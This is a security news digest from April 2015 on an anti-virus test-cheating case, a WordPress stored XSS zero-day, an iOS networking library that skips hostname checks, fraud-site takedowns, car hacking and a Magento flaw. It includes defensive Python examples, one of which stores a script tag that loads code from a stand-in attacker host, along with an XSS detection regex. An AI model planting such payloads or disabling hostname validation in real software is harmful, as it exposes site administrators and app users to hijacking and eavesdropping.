
NEWS - April 27, 2015

Apr 27, 2015 4:08AM PDT
Anti-virus product caught cheating by independent testing agency

AV-Comparatives, one of the world's leading independent testers of anti-virus products, says that it has uncovered that at least one product isn't playing by the rules.

'AV-C has uncovered an infringement of the testing agreement by one of the vendors participating in its tests. It has been found that a product submitted for testing by the vendor had been specifically engineered for the major testing labs, including AV-C; public availability of this version was limited. A second vendor is also being investigated for similar reasons. When this analysis is complete, AV-C will announce the measures it will take against the vendor(s) found to be in breach of contract.'

Imagine if the security software you or I might get from an anti-virus vendor was different from what AV-Comparatives tested. Frankly, what would be the point of reading the test at all?

Continued : https://grahamcluley.com/2015/04/anti-virus-cheat/

Just-released WordPress 0day makes it easy to hijack millions of websites
Apr 27, 2015 4:17AM PDT

The WordPress content management system used by millions of websites is vulnerable to two newly discovered threats that allow attackers to take full control of the Web server. Attack code has been released that targets one of the latest versions of WordPress, making it a zero-day exploit that could touch off a series of site hijackings throughout the Internet.

Both vulnerabilities are known as stored, or persistent, cross-site scripting (XSS) bugs. They allow an attacker to inject code into the HTML content received by administrators who maintain the website. Both attacks work by embedding malicious code into the comments section that appear by default at the bottom of a WordPress blog or article post. From there, attackers can change passwords, add new administrators, or take just about any other action legitimate admins can perform. The most serious of the two vulnerabilities is in WordPress version 4.2 because as of press time there is no patch.

Continued : http://arstechnica.com/security/2015/04/27/just-released-wordpress-0day-makes-it-easy-to-hijack-millions-of-websites/

Related:
Details on WordPress Zero Day Disclosed
WordPress Flaw Allows Arbitrary Code Execution via Comments: Researcher
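The post above describes the mechanism of a stored XSS bug: comment text is stored and later written, unescaped, into the HTML that administrators see. The following is an added example (not WordPress code) showing the vulnerable rendering beside the hardened one, plus a simple check a reviewer can run on rendered output; the comment store, the admin list template and the `evil.example` script URL are constructed stand-ins.

```python
"""Stored XSS via blog comments: unsafe rendering beside the escaped version.

Added example, not code from WordPress or from the article. The comment
store and the admin template are constructed stand-ins for a real
moderation screen.
"""
import html
import re

# Constructed comment store: one ordinary comment and one whose fields carry
# active HTML, as submitted through the public comment form.
COMMENTS = [
    {"author": "reader1", "body": "Nice post, thanks!"},
    {"author": "<b>not-an-admin</b>",
     "body": '<script src="https://evil.example/x.js"></script>'},
]

# Heuristic for markup that makes a browser run script or call inline handlers.
# Used here only as a review check on rendered output, not as a sanitizer.
ACTIVE_MARKUP = re.compile(
    r"<\s*(script|iframe|object|embed|svg)\b|\bon[a-z]+\s*=", re.I
)


def render_unsafe(comments):
    """Vulnerable: user-controlled fields are concatenated straight into the
    admin page, so a stored <script> runs in the administrator's session."""
    rows = [f"<li><b>{c['author']}</b>: {c['body']}</li>" for c in comments]
    return '<ul id="pending-comments">' + "".join(rows) + "</ul>"


def render_safe(comments):
    """Hardened: every user-controlled field is HTML-escaped at output time,
    so the browser displays the tag text instead of executing it."""
    rows = [
        f"<li><b>{html.escape(c['author'])}</b>: {html.escape(c['body'])}</li>"
        for c in comments
    ]
    return '<ul id="pending-comments">' + "".join(rows) + "</ul>"


def contains_active_markup(page_html):
    """True if the rendered page still carries script-capable markup."""
    return ACTIVE_MARKUP.search(page_html) is not None


if __name__ == "__main__":
    print("unsafe page flagged:", contains_active_markup(render_unsafe(COMMENTS)))
    print("escaped page flagged:", contains_active_markup(render_safe(COMMENTS)))
```

The fix is output encoding at the point where untrusted text meets HTML; the regex check is a smoke test for templates, not a defence, because attribute and URL contexts need their own encoders.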
2nd Crypto Bug in Networking Library Could Affect 25K Apps
Apr 27, 2015 4:18AM PDT

A few weeks after the developers of the AFNetworking library that's popular among iOS and OS X app developers patched a serious bug in the library that enabled man-in-the-middle attacks, another, similar flaw has surfaced.

The new vulnerability is related to how the AFNetworking library handles domain name validation for certificates. As it turns out, the library has a flag set that disables domain validation by default, meaning that an attacker effectively could present any valid certificate to an app affected by the vulnerability, and the app would accept it. Researchers at SourceDNA said that the vulnerability is as serious as they come for a mobile app.

"This meant that a coffee shop attacker could still eavesdrop on private data or grab control of any SSL session between the app and the Internet. Because the domain name wasn't checked, all they needed was a valid SSL certificate for any web server, something you can buy for $50," the company said in a blog post.

Continued : https://threatpost.com/second-crypto-bug-in-networking-library-could-affect-25000-apps/112433
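The failure mode in the post above is that a certificate can be fully valid and trusted yet issued for a different name; if the client skips the domain name check, such a certificate is accepted. The following is an added example (not AFNetworking or SourceDNA code) that implements the name check a client must perform and shows how a flag that disables it admits a certificate for the wrong host. The certificate dicts are constructed to mirror the shape of Python's `ssl.SSLSocket.getpeercert()`, and `validates_domain_name` is a hypothetical parameter standing in for the library flag the article mentions.

```python
"""Hostname (domain name) validation for a TLS peer certificate.

Added example, not code from AFNetworking or from the article. The certificate
dicts below are constructed to mirror the shape of ssl.getpeercert(); the
`validates_domain_name` parameter is a hypothetical stand-in for the library
flag the article describes. Chain validation is assumed to have passed.
"""
import re

# A certificate a CA would issue to whoever controls this name: valid,
# trusted, and for the wrong host (constructed).
ATTACKER_CERT = {
    "subject": ((("commonName", "coffeeshop-attacker.example"),),),
    "subjectAltName": (("DNS", "coffeeshop-attacker.example"),),
}

# The certificate the app should actually be talking to (constructed).
LEGIT_CERT = {
    "subject": ((("commonName", "api.bank.example"),),),
    "subjectAltName": (("DNS", "api.bank.example"), ("DNS", "*.bank.example")),
}

_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"


def _dns_names(cert):
    """Collect DNS names from subjectAltName; fall back to CN only if SAN is absent."""
    names = [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]
    if names:
        return names
    for rdn in cert.get("subject", ()):
        for key, value in rdn:
            if key == "commonName":
                names.append(value)
    return names


def _name_matches(pattern, hostname):
    """RFC 6125-style match: case-insensitive; a wildcard is honoured only as
    the entire leftmost label and matches exactly one label."""
    pattern, hostname = pattern.lower(), hostname.lower()
    if "*" not in pattern:
        return pattern == hostname
    head, sep, tail = pattern.partition(".")
    if head != "*" or not sep:
        return False  # partial or non-leftmost wildcards are rejected
    host_head, host_sep, host_tail = hostname.partition(".")
    return bool(host_sep) and host_tail == tail and re.fullmatch(_LABEL, host_head) is not None


def hostname_matches(cert, hostname):
    """True if any DNS name in the certificate matches the expected host."""
    return any(_name_matches(name, hostname) for name in _dns_names(cert))


def accept_certificate(cert, expected_host, validates_domain_name=True):
    """Trust decision after chain validation. With validates_domain_name=False
    any valid certificate is accepted, which is the bug the article describes."""
    if not validates_domain_name:
        return True
    return hostname_matches(cert, expected_host)


if __name__ == "__main__":
    for flag in (True, False):
        print("domain check", flag, "-> attacker cert accepted:",
              accept_certificate(ATTACKER_CERT, "api.bank.example", flag))
```

The equivalent knob in Python's standard library is `ssl.SSLContext.check_hostname`, which `ssl.create_default_context()` leaves enabled; the check is cheap to audit because it is a single boolean and a single expected name.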

Taking Down Fraud Sites is Whac-a-Mole
Apr 27, 2015 4:18AM PDT
Brian Krebs @ his "Krebs on Security" blog:

I've been doing quite a bit of public speaking lately — usually about cybercrime and underground activity — and there's one question that nearly always comes from the audience: "Why are these fraud Web sites allowed to operate, and not simply taken down?" This post is intended to serve as the go-to spot for answering that question.

Q: Why not take down the hundreds of sites now selling stolen credit cards and identity data?

For starters, it's not always so easy to take these sites offline. Many of them rely on domain name registrars that routinely ignore abuse requests. The same goes for the organizations hosting a number of these unsavory markets. What's more, most crime shops have a slew of new domain variations at a variety of hosting providers and registrars that they can turn to if they do get shut down.

Continued : http://krebsonsecurity.com/2015/04/taking-down-fraud-sites-is-whac-a-mole/

Researchers Plan to Demonstrate a Wireless Car Hack This Summer
Apr 27, 2015 4:18AM PDT

At the Black Hat and Defcon security conferences this August, security researchers Charlie Miller and Chris Valasek have announced they plan to wirelessly hack the digital network of a car or truck. That network, known as the CAN bus, is the connected system of computers that influences everything from the vehicle's horn and seat belts to its steering and brakes. And their upcoming public demonstrations may be the most definitive proof yet of cars' vulnerability to remote attacks, the result of more than two years of work since Miller and Valasek first received a DARPA grant to investigate cars' security in 2013.

"We will show the reality of car hacking by demonstrating exactly how a remote attack works against an unaltered, factory vehicle," the hackers write in an abstract of their talk that appeared on the Black Hat website last week. "Starting with remote exploitation, we will show how to pivot through different pieces of the vehicle's hardware in order to be able to send messages on the CAN bus to critical electronic control units. We will conclude by showing several CAN messages that affect physical systems of the vehicle."

Continued : http://www.wired.com/2015/04/researchers-plan-wirelessly-hack-car-public-summer/

Flaw on eBay's Magento platform lets hackers attack web stores
Apr 27, 2015 5:11AM PDT

Those using Magento's e-commerce platform should ensure they're using its latest software, as attackers are increasingly exploiting a flaw patched two months ago, security companies warned.

The vulnerability can allow an attacker to gain complete control over a store with administrator access, potentially allowing credit card theft, wrote Netanel Rubin of Check Point's Malware and Vulnerability Research Group. As many as 200,000 websites use Magento, which is owned by eBay.

Check Point, which found the flaw, reported it to Magento, which issued a patch (SUPEE-5344) on 9 February. Since Check Point revealed the flaw earlier this week, it appears attackers have picked up on it and are trying to find unpatched applications.

Continued : http://www.techworld.com/news/security/hackers-exploit-magento-e-commerce-vulnerability-3609323/

Related:
100,000 web shops open to compromise as attackers exploit Magento bug
Potent, in-the-wild exploits imperil customers of 100,000 e-commerce sites